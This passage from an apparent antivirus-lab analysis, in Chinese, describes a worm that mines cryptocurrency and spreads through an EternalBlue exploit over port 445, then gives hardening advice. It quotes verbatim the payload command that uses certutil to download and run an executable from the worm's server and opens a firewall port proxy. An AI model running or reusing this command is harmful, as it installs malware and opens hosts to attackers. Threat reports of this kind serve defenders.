創(chuàng)建線程判斷母體進程是否存在
調(diào)用OpenFileMappingA打開共享內(nèi)存 ， 讀取共享內(nèi)存數(shù)據(jù)
讀取共享內(nèi)存數(shù)據(jù)
調(diào)用RtlDecompressBuffer函數(shù)解壓共享內(nèi)存中的數(shù)據(jù) ， 為下一步執(zhí)行做準(zhǔn)備
解壓共享內(nèi)存數(shù)據(jù)
共享內(nèi)存數(shù)據(jù)加壓完后會執(zhí)行 ， 目前該shellcode主要功能挖礦,不排除后期會拉取其他更加惡意如加密勒索等木馬病毒執(zhí)行
執(zhí)行shellcode
嘗試挖礦時通信IP為172.105.204.237
2.3 攻擊模塊
攻擊模塊從地址hxxp://dl.haqo.net/eb.exez下載 ， 作為子進程Svvhost.Exe啟動 ， 分析發(fā)現(xiàn)該文件是通過python實現(xiàn)的“永恒之藍(lán)”漏洞利用模塊壓縮打包程序 。
子進程Svvhost.Exe為將python實現(xiàn)的“永恒之藍(lán)”漏洞利用模塊壓縮打包程序 。
Mysmb.pyo為攻擊時掃描代碼 。
GitHub上也可以看到相關(guān)開源代碼
掃描內(nèi)網(wǎng)445端口進行攻擊
不僅攻擊內(nèi)網(wǎng)漏洞機器 ， 還隨機找?guī)讉€外網(wǎng)IP嘗試攻擊 ， 1次攻擊完后沉默20分鐘
攻擊成功后paylaod在中招機器執(zhí)行以下命令進行內(nèi)網(wǎng)擴散傳播
cmd.exe /c certutil -urlcache -split -f http://dl.haqo.net/dl.exe c:/install.exe&c:/install.exe&netsh firewall add portopening tcp 65531 DNS&netsh interface portproxy add v4tov4 listenport=65531 connectaddress=1.1.1.1 connectport=53
安全建議1. 服務(wù)器暫時關(guān)閉不必要的端口（如135、139、445） ， 方法可參考：https://guanjia.qq.com/web_clinic/s8/585.html
2. 企業(yè)用戶在周一上班后 ， 建議使用騰訊御點查殺病毒（個人用戶可使用騰訊電腦管家） ， 然后使用漏洞修復(fù)功能 ， 修復(fù)全網(wǎng)終端存在的系統(tǒng)高危漏洞；
3. 服務(wù)器使用高強度密碼 ， 切勿使用弱口令 ， 防止黑客暴力破解；
4. 使用殺毒軟件攔截可能的病毒攻擊；
5. 推薦企業(yè)用戶部署騰訊御界高級威脅檢測系統(tǒng)防御可能的黑客攻擊 。御界高級威脅檢測系統(tǒng) ， 是基于騰訊反病毒實驗室的安全能力、依托騰訊在云和端的海量數(shù)據(jù) ， 研發(fā)出的獨特威脅情報和惡意檢測模型系統(tǒng) 。

以上關(guān)于本文的內(nèi)容，僅作參考！溫馨提示：如遇健康、疾病相關(guān)的問題，請您及時就醫(yī)或請專業(yè)人士給予相關(guān)指導(dǎo)!

• 手機自動搶購秒殺軟件推薦 京東商城搶購技巧
• 新手電腦如何安裝軟件 電腦怎么安裝
• 設(shè)置方法 電腦截圖快捷鍵ctrl加什么
• 遇上情敵別怕 三招讓她自動消失
• 1分鐘教你設(shè)置自動清理垃圾 怎么自動釋放內(nèi)存
• 臺式機電腦硬盤怎么安裝 硬盤怎么裝
• 電腦突然死機 電腦突然死機是什么原因造成的
• 筆記本板載內(nèi)存可以更換嗎 怎么看電腦內(nèi)存條型號
• 手機上可視化編程app 自動化開發(fā)軟件有哪些
• 如何將手機網(wǎng)絡(luò)共享至電腦 怎樣將手機網(wǎng)絡(luò)共享到電腦